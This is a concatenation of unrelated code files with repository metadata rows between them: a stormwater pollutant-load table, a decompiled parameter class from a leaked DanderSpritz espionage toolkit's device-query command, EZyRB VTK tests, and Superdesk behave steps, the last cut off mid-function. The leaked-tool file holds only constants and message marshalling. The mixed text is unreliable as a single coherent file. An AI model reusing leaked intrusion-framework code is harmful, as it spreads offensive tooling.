# (4) New Hampshire Dept. of Environmental Services, 2010. Guidance for Estimating Pre- and Post-Development
# Stormwater Loads. (EMCs available at
# http://www.des.nh.gov/organization/divisions/water/stormwater/documents/wd-08-20a_apxd.pdf)
# (5) Washington State Dept. of Ecology, 2007. Efficiency of Urban Stormwater Best Management Practices:
# A Literature Review. Publication No. 07-03-009, 12 pp.
# (6) Keiser & Associates, 2003. Empirical Sediment and Phosphorus Nonpoint Source Model for the St. Joseph River
# Watershed. 48 pp.
POLLUTION_LOADS = {
11: {'tn': 0, 'tp': 0, 'bod': 0, 'tss': 0}, # Open water
12: {'tn': 0, 'tp': 0, 'bod': 0, 'tss': 0}, # Perennial Ice/Snow
21: {'tn': 2.26, 'tp': 0.32, 'bod': 5.7, 'tss': 99.8}, # Developed, Open Space
22: {'tn': 2.58, 'tp': 0.38, 'bod': 6.0, 'tss': 126}, # Developed, Low Intensity
23: {'tn': 3.62, 'tp': 0.38, 'bod': 9.0, 'tss': 134.7}, # Developed, Medium Intensity
24: {'tn': 3.54, 'tp': 0.35, 'bod': 9.9, 'tss': 163.7}, # Developed High Intensity
31: {'tn': 0.10, 'tp': 0.01, 'bod': 0.0, 'tss': 1}, # Barren Land (Rock/Sand/Clay)
32: {'tn': 0.10, 'tp': 0.01, 'bod': 0.0, 'tss': 1}, # Quarries/Strip Mines/Gravel Pits
41: {'tn': 1.05, 'tp': 0.13, 'bod': 0.5, 'tss': 45}, # Deciduous Forest
42: {'tn': 1.05, 'tp': 0.13, 'bod': 0.5, 'tss': 45}, # Evergreen Forest
43: {'tn': 1.05, 'tp': 0.13, 'bod': 0.5, 'tss': 45}, # Mixed Forest
51: {'tn': 0, 'tp': 0, 'bod': 0, 'tss': 0}, # Dwarf Scrub (Alaska Only, N/A)
52: {'tn': 0.19, 'tp': 0.15, 'bod': 0.5, 'tss': 39}, # Shrub/Scrub
71: {'tn': 2.30, 'tp': 0.22, 'bod': 0.5, 'tss': 48.8}, # Grassland/Herbaceous
72: {'tn': 0, 'tp': 0, 'bod': 0, 'tss': 0}, # Sedge/Herbaceous (Alaska Only, N/A)
73: {'tn': 0, 'tp': 0, 'bod': 0, 'tss': 0}, # Lichens (Alaska Only, N/A)
74: {'tn': 0, 'tp': 0, 'bod': 0, 'tss': 0}, # Moss (Alaska Only, N/A)
81: {'tn': 5.71, 'tp': 0.55, 'bod': 13, 'tss': 145}, # Pasture/Hay
82: {'tn': 7.70, 'tp': 1.07, 'bod': 12.45, 'tss': 216}, # Cultivated Crops
90: {'tn': 0.19, 'tp': 0.006, 'bod': 0.5, 'tss': 0}, # Woody Wetlands
91: {'tn': 0.19, 'tp': 0.006, 'bod': 0.5, 'tss': 0},
92: {'tn': 0.19, 'tp': 0.006, 'bod': 0.5, 'tss': 0},
93: {'tn': 0.19, 'tp': 0.006, 'bod': 0.5, 'tss': 0},
94: {'tn': 0.19, 'tp': 0.006, 'bod': 0.5, 'tss': 0},
95: {'tn': 0.19, 'tp': 0.006, 'bod': 0.5, 'tss': 0}, # Emergent Herbaceous Wetlands
96: {'tn': 0.19, 'tp': 0.006, 'bod': 0.5, 'tss': 0},
97: {'tn': 0.19, 'tp': 0.006, 'bod': 0.5, 'tss': 0},
98: {'tn': 0.19, 'tp': 0.006, 'bod': 0.5, 'tss': 0},
99: {'tn': 0.19, 'tp': 0.006, 'bod': 0.5, 'tss': 0}
}
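# Editor's note: a hedged back-of-envelope sketch (not part of the original
# module). The values above are event mean concentrations (EMCs) in mg/l, so a
# rough pollutant load for a runoff volume in cubic metres would be, assuming a
# hypothetical `runoff_volume_m3` input:
#   emc = POLLUTION_LOADS[82]['tn']           # 7.70 mg/l for cultivated crops
#   load_kg = emc * runoff_volume_m3 / 1000   # mg/l * 1000 l/m3 * 1e-6 kg/mg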
|
apache-2.0
| 2,153,564,880,117,881,900 | 71.096654 | 158 | 0.601526 | false |
DarthMaulware/EquationGroupLeaks
|
Leak #5 - Lost In Translation/windows/Resources/Dsz/PyScripts/Lib/dsz/mca/status/cmd/devicequery/type_Params.py
|
1
|
3783
|
# uncompyle6 version 2.9.10
# Python bytecode 2.7 (62211)
# Decompiled from: Python 3.6.0b2 (default, Oct 11 2016, 05:27:10)
# [GCC 6.2.0 20161005]
# Embedded file name: type_Params.py
from types import *
import array
PARAMS_DEVICE_TYPE_USER_SPECIFIC = 0
PARAMS_DEVICE_TYPE_U1394 = 1
PARAMS_DEVICE_TYPE_ADAPTER = 2
PARAMS_DEVICE_TYPE_ALL = 255
PARAMS_DEVICE_TYPE_APM_SUPPORT = 3
PARAMS_DEVICE_TYPE_BATTERY = 4
PARAMS_DEVICE_TYPE_CDROM = 5
PARAMS_DEVICE_TYPE_COMPUTER = 6
PARAMS_DEVICE_TYPE_DECODER = 7
PARAMS_DEVICE_TYPE_DISK_DRIVE = 8
PARAMS_DEVICE_TYPE_DISPLAY = 9
PARAMS_DEVICE_TYPE_FDC = 10
PARAMS_DEVICE_TYPE_FLOPPY = 11
PARAMS_DEVICE_TYPE_GPS = 12
PARAMS_DEVICE_TYPE_HDC = 13
PARAMS_DEVICE_TYPE_HID_CLASS = 14
PARAMS_DEVICE_TYPE_IMAGE = 15
PARAMS_DEVICE_TYPE_INFRARED = 16
PARAMS_DEVICE_TYPE_KEYBOARD = 17
PARAMS_DEVICE_TYPE_LEGACY_DRIVER = 18
PARAMS_DEVICE_TYPE_MEDIA = 19
PARAMS_DEVICE_TYPE_MEDIUM_CHANGER = 20
PARAMS_DEVICE_TYPE_MODEM = 21
PARAMS_DEVICE_TYPE_MONITOR = 22
PARAMS_DEVICE_TYPE_MOUSE = 23
PARAMS_DEVICE_TYPE_MTD = 24
PARAMS_DEVICE_TYPE_MULTIFUNCTION = 25
PARAMS_DEVICE_TYPE_MULTIPORT_SERIAL = 26
PARAMS_DEVICE_TYPE_NET = 27
PARAMS_DEVICE_TYPE_NET_CLIENT = 28
PARAMS_DEVICE_TYPE_NET_SERVICE = 29
PARAMS_DEVICE_TYPE_NET_TRANS = 30
PARAMS_DEVICE_TYPE_NO_DRIVER = 31
PARAMS_DEVICE_TYPE_PARALLEL = 32
PARAMS_DEVICE_TYPE_PCMCIA = 33
PARAMS_DEVICE_TYPE_PORTS = 34
PARAMS_DEVICE_TYPE_PRINTER = 35
PARAMS_DEVICE_TYPE_PRINTER_UPGRADE = 36
PARAMS_DEVICE_TYPE_SCSI_ADAPTER = 37
PARAMS_DEVICE_TYPE_SMART_CARD_READER = 38
PARAMS_DEVICE_TYPE_SOUND = 39
PARAMS_DEVICE_TYPE_STILL_IMAGE = 40
PARAMS_DEVICE_TYPE_SYSTEM = 41
PARAMS_DEVICE_TYPE_TAPE_DRIVE = 42
PARAMS_DEVICE_TYPE_UNKNOWN = 43
PARAMS_DEVICE_TYPE_USB = 44
PARAMS_DEVICE_TYPE_VOLUME = 45
PARAMS_DEVICE_TYPE_U1394DEBUG = 46
PARAMS_DEVICE_TYPE_U61883 = 47
PARAMS_DEVICE_TYPE_AVC = 48
PARAMS_DEVICE_TYPE_BIOMETRIC = 49
PARAMS_DEVICE_TYPE_BLUETOOTH = 50
PARAMS_DEVICE_TYPE_DOT4 = 51
PARAMS_DEVICE_TYPE_DOT4PRINT = 52
PARAMS_DEVICE_TYPE_ENUM1394 = 53
PARAMS_DEVICE_TYPE_INFINIBAND = 54
PARAMS_DEVICE_TYPE_PNPPRINTERS = 55
PARAMS_DEVICE_TYPE_PROCESSOR = 56
PARAMS_DEVICE_TYPE_SBP2 = 57
PARAMS_DEVICE_TYPE_SECURITYACCELERATOR = 58
PARAMS_DEVICE_TYPE_VOLUMESNAPSHOT = 59
PARAMS_DEVICE_TYPE_WCEUSBS = 60
PARAMS_GUID_LEN = 16
class Params:
def __init__(self):
self.__dict__['choice'] = PARAMS_DEVICE_TYPE_USER_SPECIFIC
self.__dict__['guid'] = array.array('B')
i = 0
while i < PARAMS_GUID_LEN:
self.__dict__['guid'].append(0)
i = i + 1
def __getattr__(self, name):
if name == 'choice':
return self.__dict__['choice']
if name == 'guid':
return self.__dict__['guid']
raise AttributeError("Attribute '%s' not found" % name)
def __setattr__(self, name, value):
if name == 'choice':
self.__dict__['choice'] = value
elif name == 'guid':
self.__dict__['guid'] = value
else:
raise AttributeError("Attribute '%s' not found" % name)
def Marshal(self, mmsg):
from mcl.object.Message import MarshalMessage
submsg = MarshalMessage()
submsg.AddU32(MSG_KEY_PARAMS_CHOICE, self.__dict__['choice'])
submsg.AddData(MSG_KEY_PARAMS_GUID, self.__dict__['guid'])
mmsg.AddMessage(MSG_KEY_PARAMS, submsg)
def Demarshal(self, dmsg, instance=-1):
import mcl.object.Message
msgData = dmsg.FindData(MSG_KEY_PARAMS, mcl.object.Message.MSG_TYPE_MSG, instance)
submsg = mcl.object.Message.DemarshalMessage(msgData)
self.__dict__['choice'] = submsg.FindU32(MSG_KEY_PARAMS_CHOICE)
try:
self.__dict__['guid'] = submsg.FindData(MSG_KEY_PARAMS_GUID)
except:
pass
|
unlicense
| 8,606,701,729,567,228,000 | 32.785714 | 90 | 0.686228 | false |
fsalmoir/EZyRB
|
tests/test_vtkhandler.py
|
1
|
5854
|
from unittest import TestCase
import unittest
import ezyrb.vtkhandler as vh
import numpy as np
import filecmp
import os
class TestVtkHandler(TestCase):
def test_vtk_instantiation(self):
vtk_handler = vh.VtkHandler()
def test_vtk_default_infile_member(self):
vtk_handler = vh.VtkHandler()
assert vtk_handler.infile == None
def test_vtk_default_extension_member(self):
vtk_handler = vh.VtkHandler()
assert vtk_handler.extension == '.vtk'
def test_vtk_parse_failing_filename_type(self):
vtk_handler = vh.VtkHandler()
with self.assertRaises(TypeError):
output = vtk_handler.parse(5.2)
def test_vtk_parse_failing_output_name_type(self):
vtk_handler = vh.VtkHandler()
with self.assertRaises(TypeError):
output = vtk_handler.parse('tests/test_datasets/matlab_output_test.mat', 5.2)
def test_vtk_parse_failing_check_extension(self):
vtk_handler = vh.VtkHandler()
with self.assertRaises(ValueError):
output = vtk_handler.parse('tests/test_datasets/matlab_output_test.mat')
def test_vtk_parse_infile(self):
vtk_handler = vh.VtkHandler()
output = vtk_handler.parse('tests/test_datasets/matlab_field_test_bin.vtk', 'Pressure')
assert vtk_handler.infile == 'tests/test_datasets/matlab_field_test_bin.vtk'
def test_vtk_parse_shape(self):
vtk_handler = vh.VtkHandler()
output = vtk_handler.parse('tests/test_datasets/matlab_field_test_bin.vtk', 'Pressure')
assert output.shape == (2500, 1)
def test_vtk_parse_check_data_format_1(self):
vtk_handler = vh.VtkHandler()
output = vtk_handler.parse('tests/test_datasets/matlab_field_test_bin.vtk', 'Pressure')
assert vtk_handler.cell_data == False
def test_vtk_parse_check_data_format_2(self):
vtk_handler = vh.VtkHandler()
output = vtk_handler.parse('tests/test_datasets/openfoam_output_test.vtk', 'p')
assert vtk_handler.cell_data == True
def test_vtk_parse_coords_1(self):
vtk_handler = vh.VtkHandler()
output = vtk_handler.parse('tests/test_datasets/matlab_field_test_bin.vtk', 'Pressure')
np.testing.assert_almost_equal(output[33][0], 3.7915385)
def test_vtk_parse_coords_2(self):
vtk_handler = vh.VtkHandler()
output = vtk_handler.parse('tests/test_datasets/matlab_field_test_bin.vtk', 'Pressure')
np.testing.assert_almost_equal(output[0][0], 8.2308226)
def test_vtk_write_failing_filename_type(self):
vtk_handler = vh.VtkHandler()
output = vtk_handler.parse('tests/test_datasets/matlab_field_test_bin.vtk', 'Pressure')
with self.assertRaises(TypeError):
vtk_handler.write(output, 4.)
def test_vtk_write_failing_check_extension(self):
vtk_handler = vh.VtkHandler()
output = vtk_handler.parse('tests/test_datasets/matlab_field_test_bin.vtk', 'Pressure')
with self.assertRaises(ValueError):
vtk_handler.write(output, 'tests/test_datasets/matlab_output_test_out.mat')
def test_vtk_write_failing_infile_instantiation(self):
vtk_handler = vh.VtkHandler()
output = np.zeros((40, 3))
with self.assertRaises(RuntimeError):
vtk_handler.write(output, 'tests/test_datasets/matlab_field_test_out.vtk')
def test_vtk_write_default_output_name(self):
vtk_handler = vh.VtkHandler()
output = vtk_handler.parse('tests/test_datasets/matlab_field_test_bin.vtk', 'Pressure')
outfilename = 'tests/test_datasets/matlab_field_test_out_bin.vtk'
vtk_handler.write(output, outfilename, write_bin=True)
os.remove(outfilename)
def test_vtk_write_comparison_bin_1(self):
import vtk
vtk_handler = vh.VtkHandler()
output = vtk_handler.parse('tests/test_datasets/matlab_field_test_bin.vtk', 'Pressure')
output[0] = [1.1]
output[1] = [1.1]
output[2] = [1.1]
output[11] = [1.1]
output[12] = [1.1]
output[13] = [1.1]
output[30] = [1.1]
output[31] = [1.1]
output[32] = [1.1]
outfilename = 'tests/test_datasets/matlab_field_test_out_bin.vtk'
if vtk.VTK_MAJOR_VERSION <= 5:
outfilename_expected = 'tests/test_datasets/matlab_field_test_out_true_bin_version5.vtk'
else:
outfilename_expected = 'tests/test_datasets/matlab_field_test_out_true_bin_version6.vtk'
vtk_handler.write(output, outfilename, 'Pressure', write_bin=True)
self.assertTrue(filecmp.cmp(outfilename, outfilename_expected))
os.remove(outfilename)
def test_vtk_write_comparison_bin_ascii(self):
import vtk
vtk_handler = vh.VtkHandler()
output = vtk_handler.parse('tests/test_datasets/openfoam_output_test.vtk', 'p')
output[0] = [1.1]
output[1] = [1.1]
output[2] = [1.1]
output[11] = [1.1]
output[12] = [1.1]
output[13] = [1.1]
output[30] = [1.1]
output[31] = [1.1]
output[32] = [1.1]
outfilename = 'tests/test_datasets/openfoam_output_test_out.vtk'
if vtk.VTK_MAJOR_VERSION <= 5:
outfilename_expected = 'tests/test_datasets/openfoam_output_test_out_true_version5.vtk'
else:
outfilename_expected = 'tests/test_datasets/openfoam_output_test_out_true_version6.vtk'
vtk_handler.write(output, outfilename, 'p')
self.assertTrue(filecmp.cmp(outfilename, outfilename_expected))
os.remove(outfilename)
def test_vtk_write_comparison_ascii(self):
import vtk
vtk_handler = vh.VtkHandler()
output = vtk_handler.parse('tests/test_datasets/matlab_field_test_ascii.vtk', 'Pressure')
output[0] = [1.1]
output[1] = [1.1]
output[2] = [1.1]
output[11] = [1.1]
output[12] = [1.1]
output[13] = [1.1]
output[30] = [1.1]
output[31] = [1.1]
output[32] = [1.1]
outfilename = 'tests/test_datasets/matlab_field_test_out_ascii.vtk'
if vtk.VTK_MAJOR_VERSION <= 5:
outfilename_expected = 'tests/test_datasets/matlab_field_test_out_true_ascii_version5.vtk'
else:
outfilename_expected = 'tests/test_datasets/matlab_field_test_out_true_ascii_version6.vtk'
vtk_handler.write(output, outfilename, 'Pressure')
self.assertTrue(filecmp.cmp(outfilename, outfilename_expected))
os.remove(outfilename)
|
mit
| 7,400,576,381,474,663,000 | 30.473118 | 93 | 0.709771 | false |
hlmnrmr/superdesk-core
|
superdesk/tests/steps.py
|
1
|
91099
|
# -*- coding: utf-8; -*-
#
# This file is part of Superdesk.
#
# Copyright 2013, 2014 Sourcefabric z.u. and contributors.
#
# For the full copyright and license information, please see the
# AUTHORS and LICENSE files distributed with this source code, or
# at https://www.sourcefabric.org/superdesk/license
import os
import time
import shutil
from base64 import b64encode
from datetime import datetime, timedelta
from os.path import basename
from re import findall
from unittest.mock import patch
from urllib.parse import urlparse
import arrow
from behave import given, when, then # @UnresolvedImport
from bson import ObjectId
from eve.io.mongo import MongoJSONEncoder
from eve.methods.common import parse
from eve.utils import ParsedRequest, config
from flask import json
from wooper.assertions import (
assert_in, assert_equal, assertions
)
from wooper.general import (
fail_and_print_body, apply_path, parse_json_response,
WooperAssertionError
)
from wooper.expect import (
expect_status, expect_status_in,
expect_json, expect_json_length,
expect_json_contains, expect_json_not_contains,
expect_headers_contain,
)
import superdesk
from superdesk import tests
from superdesk.io import registered_feeding_services
from superdesk.io.commands.update_ingest import LAST_ITEM_UPDATE
from superdesk import default_user_preferences, get_resource_service, utc, etree
from superdesk.io.feed_parsers import XMLFeedParser, EMailRFC822FeedParser
from superdesk.utc import utcnow, get_expiry_date
from superdesk.tests import get_prefixed_url, set_placeholder
from apps.dictionaries.resource import DICTIONARY_FILE
from superdesk.filemeta import get_filemeta
external_url = 'http://thumbs.dreamstime.com/z/digital-nature-10485007.jpg'
DATETIME_FORMAT = "%Y-%m-%dT%H:%M:%S%z"
ANALYTICS_DATETIME_FORMAT = "%Y-%m-%d %H:00:00"
def test_json(context):
try:
response_data = json.loads(context.response.get_data())
except Exception:
fail_and_print_body(context.response, 'response is not valid json')
context_data = json.loads(apply_placeholders(context, context.text))
assert_equal(json_match(context_data, response_data), True,
msg=str(context_data) + '\n != \n' + str(response_data))
return response_data
def test_json_with_string_field_value(context, field):
try:
response_data = json.loads(context.response.get_data())
except Exception:
fail_and_print_body(context.response, 'response is not valid json')
context_data = json.loads(apply_placeholders(context, context.text))
assert_equal(json_match(context_data[field], response_data[field]), True,
msg=str(context_data) + '\n != \n' + str(response_data))
return response_data
def test_key_is_present(key, context, response):
"""Test if given key is present in response.
In case the context value is empty - "", {}, [] - it checks if it's non empty in response.
If it's set in context to false, it will check that it's falsy/empty in response too.
:param key
:param context
:param response
"""
assert not isinstance(context[key], bool) or not response[key], \
'"%s" should be empty or false, but it was "%s" in (%s)' % (key, response[key], response)
def test_key_is_not_present(key, response):
"""Test if given key is not present in response.
:param key
:param response
"""
assert key not in response, \
'"%s" should not be present, but it was "%s" in (%s)' % (key, response[key], response)
def assert_is_now(val, key):
"""Assert that given datetime value is now (with 2s tolerance).
:param val: datetime
:param key: val label - used for error reporting
"""
now = arrow.get()
val = arrow.get(val)
assert val + timedelta(seconds=2) > now, '%s should be now, it is %s' % (key, val)
def json_match(context_data, response_data):
if isinstance(context_data, dict):
if (not isinstance(response_data, dict)):
return False
for key in context_data:
if context_data[key] == "__none__":
assert response_data[key] is None
continue
if context_data[key] == "__no_value__":
test_key_is_not_present(key, response_data)
continue
if key not in response_data:
print(key, ' not in ', response_data)
return False
if context_data[key] == "__any_value__":
test_key_is_present(key, context_data, response_data)
continue
if context_data[key] == "__now__":
assert_is_now(response_data[key], key)
continue
if context_data[key] == "__empty__":
assert len(response_data[key]) == 0, '%s is not empty' % key
continue
if not json_match(context_data[key], response_data[key]):
return False
return True
elif isinstance(context_data, list):
for item_context in context_data:
found = False
for item_response in response_data:
if json_match(item_context, item_response):
found = True
break
if not found:
print(item_context, ' not in ', json.dumps(response_data, indent=2))
return False
return True
    else:
if context_data != response_data:
print('---' + str(context_data) + '---\n', ' != \n', '---' + str(response_data) + '---\n')
return context_data == response_data
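# The markers handled by json_match above form a small assertion DSL used by the
# feature files. A hypothetical sketch of how they behave (values invented for
# illustration, not taken from any real scenario):
#
#   json_match({'lock_user': '__none__'}, {'lock_user': None})          # True
#   json_match({'slugline': '__any_value__'}, {'slugline': 'update'})   # True
#   json_match({'groups': '__empty__'}, {'groups': []})                 # True
#   json_match([{'_id': 'x'}], [{'_id': 'y'}, {'_id': 'x'}])            # True (subset match on lists)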
def get_fixture_path(context, fixture):
path = context.app.settings['BEHAVE_TESTS_FIXTURES_PATH']
return os.path.join(path, fixture)
def get_macro_path(macro):
abspath = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))
return os.path.join(abspath, 'macros', macro)
def get_self_href(resource, context):
    assert '_links' in resource, 'expected "_links", but got only %s' % (resource)
return resource['_links']['self']['href']
def get_res(url, context):
response = context.client.get(get_prefixed_url(context.app, url), headers=context.headers)
expect_status(response, 200)
return json.loads(response.get_data())
def parse_date(datestr):
return datetime.strptime(datestr, DATETIME_FORMAT)
def format_date(date_to_format):
return date_to_format.strftime(DATETIME_FORMAT)
def format_date_analytics(date_to_format):
return date_to_format.strftime(ANALYTICS_DATETIME_FORMAT)
def assert_200(response):
"""Assert we get status code 200."""
expect_status_in(response, (200, 201, 204))
def assert_404(response):
"""Assert we get status code 404."""
assert response.status_code == 404, 'Expected 404, got %d' % (response.status_code)
def assert_ok(response):
"""Assert we get ok status within api response."""
expect_status_in(response, (200, 201))
expect_json_contains(response, {'_status': 'OK'})
def get_json_data(response):
return json.loads(response.get_data())
def get_it(context):
it = context.data[0]
res = get_res('/%s/%s' % (context.resource, it['_id']), context)
return get_self_href(res, context), res.get('_etag')
def if_match(context, etag):
headers = []
if etag:
headers = [('If-Match', etag)]
headers = unique_headers(headers, context.headers)
return headers
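# if_match() builds the headers for a conditional write: when an etag is known it
# adds an If-Match header on top of the session headers, otherwise the session
# headers are passed through unchanged.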
def unique_headers(headers_to_add, old_headers):
headers = dict(old_headers)
for item in headers_to_add:
headers.update({item[0]: item[1]})
unique_headers = [(k, v) for k, v in headers.items()]
return unique_headers
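# unique_headers() de-duplicates by header name, letting the newly added values win.
# For example (hypothetical values):
#   unique_headers([('If-Match', 'new')], [('Authorization', 'basic x'), ('If-Match', 'old')])
#   -> [('Authorization', 'basic x'), ('If-Match', 'new')]   (ordering not guaranteed)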
def patch_current_user(context, data):
response = context.client.get(get_prefixed_url(context.app, '/users/%s' % context.user['_id']),
headers=context.headers)
user = json.loads(response.get_data())
headers = if_match(context, user.get('_etag'))
response = context.client.patch(get_prefixed_url(context.app, '/users/%s' % context.user['_id']),
data=data, headers=headers)
assert_ok(response)
return response
def apply_placeholders(context, text):
placeholders = getattr(context, 'placeholders', {})
for placeholder in findall('#([^#"]+)#', text):
if placeholder.startswith('DATE'):
value = utcnow()
unit = placeholder.find('+')
if unit != -1:
value += timedelta(days=int(placeholder[unit + 1]))
else:
unit = placeholder.find('-')
if unit != -1:
value -= timedelta(days=int(placeholder[unit + 1]))
if placeholder == 'ANALYTICS_DATE_FORMATTED':
value = format_date_analytics(value)
else:
value = format_date(value)
placeholders['LAST_DATE_VALUE'] = value
elif placeholder not in placeholders:
try:
resource_name, field_name = placeholder.split('.', maxsplit=1)
except Exception:
continue
resource = getattr(context, resource_name, None)
for name in field_name.split('.'):
if not resource:
break
resource = resource.get(name, None)
if not resource:
continue
if isinstance(resource, datetime):
value = format_date(resource)
else:
value = str(resource)
else:
value = placeholders[placeholder]
text = text.replace('#%s#' % placeholder, value)
return text
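# Placeholder syntax understood by apply_placeholders above (examples are hypothetical):
#   #DATE#                -> current UTC time formatted with DATETIME_FORMAT
#   #DATE+2# / #DATE-1#   -> now plus/minus the given (single-digit) number of days
#   #desks._id#           -> the "_id" field of the item stored on context.desks
#   #ARCHIVE_ID#          -> a value previously saved via set_placeholder(context, 'ARCHIVE_ID', ...)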
def get_resource_name(url):
parsed_url = urlparse(url)
return basename(parsed_url.path)
def format_items(items):
output = [''] # insert empty line
for item in items:
if item.get('formatted_item'):
item['formatted_item'] = json.loads(item['formatted_item'])
output.append(json.dumps(item, indent=4, sort_keys=True))
return ',\n'.join(output)
@given('empty "{resource}"')
def step_impl_given_empty(context, resource):
if not is_user_resource(resource):
with context.app.test_request_context(context.app.config['URL_PREFIX']):
get_resource_service(resource).delete_action()
@given('"{resource}"')
def step_impl_given_(context, resource):
data = apply_placeholders(context, context.text)
with context.app.test_request_context(context.app.config['URL_PREFIX']):
if not is_user_resource(resource):
get_resource_service(resource).delete_action()
items = [parse(item, resource) for item in json.loads(data)]
if is_user_resource(resource):
for item in items:
item.setdefault('needs_activation', False)
get_resource_service(resource).post(items)
context.data = items
context.resource = resource
try:
setattr(context, resource, items[-1])
except KeyError:
pass
@given('"{resource}" with objectid')
def step_impl_given_with_objectid(context, resource):
data = apply_placeholders(context, context.text)
with context.app.test_request_context(context.app.config['URL_PREFIX']):
items = [parse(item, resource) for item in json.loads(data)]
for item in items:
if '_id' in item:
item['_id'] = ObjectId(item['_id'])
get_resource_service(resource).post(items)
context.data = items
context.resource = resource
setattr(context, resource, items[-1])
@given('the "{resource}"')
def step_impl_given_the(context, resource):
with context.app.test_request_context(context.app.config['URL_PREFIX']):
if not is_user_resource(resource):
get_resource_service(resource).delete_action()
orig_items = {}
items = [parse(item, resource) for item in json.loads(context.text)]
get_resource_service(resource).post(items)
context.data = orig_items or items
context.resource = resource
@given('ingest from "{provider}"')
def step_impl_given_resource_with_provider(context, provider):
resource = 'ingest'
with context.app.test_request_context(context.app.config['URL_PREFIX']):
get_resource_service(resource).delete_action()
items = [parse(item, resource) for item in json.loads(context.text)]
ingest_provider = get_resource_service('ingest_providers').find_one(req=None,
_id=context.providers[provider])
for item in items:
item['ingest_provider'] = context.providers[provider]
item['source'] = ingest_provider.get('source')
get_resource_service(resource).post(items)
context.data = items
context.resource = resource
@given('config update')
def given_config_update(context):
diff = json.loads(context.text)
context.app.config.update(diff)
if 'AMAZON_CONTAINER_NAME' in diff:
from superdesk.storage import AmazonMediaStorage
context.app.media = AmazonMediaStorage(context.app)
m = patch.object(context.app.media, 'client')
m.start()
@given('config')
def step_impl_given_config(context):
tests.setup(context, json.loads(context.text))
tests.setup_auth_user(context)
@given('we have "{role_name}" role')
def step_impl_given_role(context, role_name):
with context.app.test_request_context(context.app.config['URL_PREFIX']):
role = get_resource_service('roles').find_one(name=role_name, req=None)
data = MongoJSONEncoder().encode({'role': role.get('_id')})
response = patch_current_user(context, data)
assert_ok(response)
@given('we have "{user_type}" as type of user')
def step_impl_given_user_type(context, user_type):
with context.app.test_request_context(context.app.config['URL_PREFIX']):
data = json.dumps({'user_type': user_type})
response = patch_current_user(context, data)
assert_ok(response)
@when('we post to auth_db')
def step_impl_when_auth(context):
data = context.text
context.response = context.client.post(
get_prefixed_url(context.app, '/auth_db'), data=data, headers=context.headers)
if context.response.status_code == 200 or context.response.status_code == 201:
item = json.loads(context.response.get_data())
if item.get('_id'):
set_placeholder(context, 'AUTH_ID', item['_id'])
context.headers.append(('Authorization', b'basic ' + b64encode(item['token'].encode('ascii') + b':')))
context.user = item['user']
@when('we sleep for {limit}s')
def when_we_sleep_for(context, limit):
time.sleep(int(limit))
@given('we create a new macro "{macro_name}"')
def step_create_new_macro(context, macro_name):
src = get_fixture_path(context, macro_name)
dst = get_macro_path(macro_name)
shutil.copyfile(src, dst)
@when('we fetch from "{provider_name}" ingest "{guid}"')
def step_impl_fetch_from_provider_ingest(context, provider_name, guid):
with context.app.test_request_context(context.app.config['URL_PREFIX']):
fetch_from_provider(context, provider_name, guid)
def embed_routing_scheme_rules(scheme):
"""Fetch all content filters referenced by the given routing scheme and embed those into scheme.
:param dict scheme: routing scheme configuration
"""
filters_service = superdesk.get_resource_service('content_filters')
rules_filters = (
(rule, str(rule['filter']))
for rule in scheme['rules'] if rule.get('filter'))
for rule, filter_id in rules_filters:
content_filter = filters_service.find_one(_id=filter_id, req=None)
rule['filter'] = content_filter
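# A minimal sketch of the routing scheme shape consumed above (ids are made up):
#
#   scheme = {
#       'rules': [
#           {'name': 'sports', 'filter': '<content_filter _id>',
#            'actions': {'fetch': [...], 'publish': [...]}},
#       ]
#   }
#
# After embed_routing_scheme_rules(scheme) each rule['filter'] holds the full
# content filter document rather than its id.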
@when('we fetch from "{provider_name}" ingest "{guid}" using routing_scheme')
def step_impl_fetch_from_provider_ingest_using_routing(context, provider_name, guid):
with context.app.test_request_context(context.app.config['URL_PREFIX']):
_id = apply_placeholders(context, context.text)
routing_scheme = get_resource_service('routing_schemes').find_one(_id=_id, req=None)
embed_routing_scheme_rules(routing_scheme)
fetch_from_provider(context, provider_name, guid, routing_scheme)
@when('we ingest and fetch "{provider_name}" "{guid}" to desk "{desk}" stage "{stage}" using routing_scheme')
def step_impl_fetch_from_provider_ingest_using_routing_with_desk(context, provider_name, guid, desk, stage):
with context.app.test_request_context(context.app.config['URL_PREFIX']):
_id = apply_placeholders(context, context.text)
desk_id = apply_placeholders(context, desk)
stage_id = apply_placeholders(context, stage)
routing_scheme = get_resource_service('routing_schemes').find_one(_id=_id, req=None)
embed_routing_scheme_rules(routing_scheme)
fetch_from_provider(context, provider_name, guid, routing_scheme, desk_id, stage_id)
@when('we ingest with routing scheme "{provider_name}" "{guid}"')
def step_impl_ingest_with_routing_scheme(context, provider_name, guid):
with context.app.test_request_context(context.app.config['URL_PREFIX']):
_id = apply_placeholders(context, context.text)
routing_scheme = get_resource_service('routing_schemes').find_one(_id=_id, req=None)
embed_routing_scheme_rules(routing_scheme)
fetch_from_provider(context, provider_name, guid, routing_scheme)
def fetch_from_provider(context, provider_name, guid, routing_scheme=None, desk_id=None, stage_id=None):
ingest_provider_service = get_resource_service('ingest_providers')
provider = ingest_provider_service.find_one(name=provider_name, req=None)
provider['routing_scheme'] = routing_scheme
if 'rule_set' in provider:
rule_set = get_resource_service('rule_sets').find_one(_id=provider['rule_set'], req=None)
else:
rule_set = None
provider_service = registered_feeding_services[provider['feeding_service']]
provider_service = provider_service.__class__()
if provider.get('name', '').lower() in ('aap', 'dpa', 'ninjs', 'email'):
file_path = os.path.join(provider.get('config', {}).get('path', ''), guid)
feeding_parser = provider_service.get_feed_parser(provider)
if isinstance(feeding_parser, XMLFeedParser):
with open(file_path, 'rb') as f:
xml_string = etree.etree.fromstring(f.read())
items = [feeding_parser.parse(xml_string, provider)]
elif isinstance(feeding_parser, EMailRFC822FeedParser):
with open(file_path, 'rb') as f:
data = f.read()
items = feeding_parser.parse([(1, data)], provider)
else:
parsed = feeding_parser.parse(file_path, provider)
items = [parsed] if not isinstance(parsed, list) else parsed
else:
provider_service.provider = provider
provider_service.URL = provider.get('config', {}).get('url')
items = provider_service.fetch_ingest(guid)
for item in items:
item['versioncreated'] = utcnow()
item['expiry'] = utcnow() + timedelta(minutes=20)
if desk_id:
from bson.objectid import ObjectId
item['task'] = {'desk': ObjectId(desk_id), 'stage': ObjectId(stage_id)}
failed = context.ingest_items(items, provider, provider_service, rule_set=rule_set,
routing_scheme=provider.get('routing_scheme'))
assert len(failed) == 0, failed
provider = ingest_provider_service.find_one(name=provider_name, req=None)
ingest_provider_service.system_update(provider['_id'], {LAST_ITEM_UPDATE: utcnow()}, provider)
for item in items:
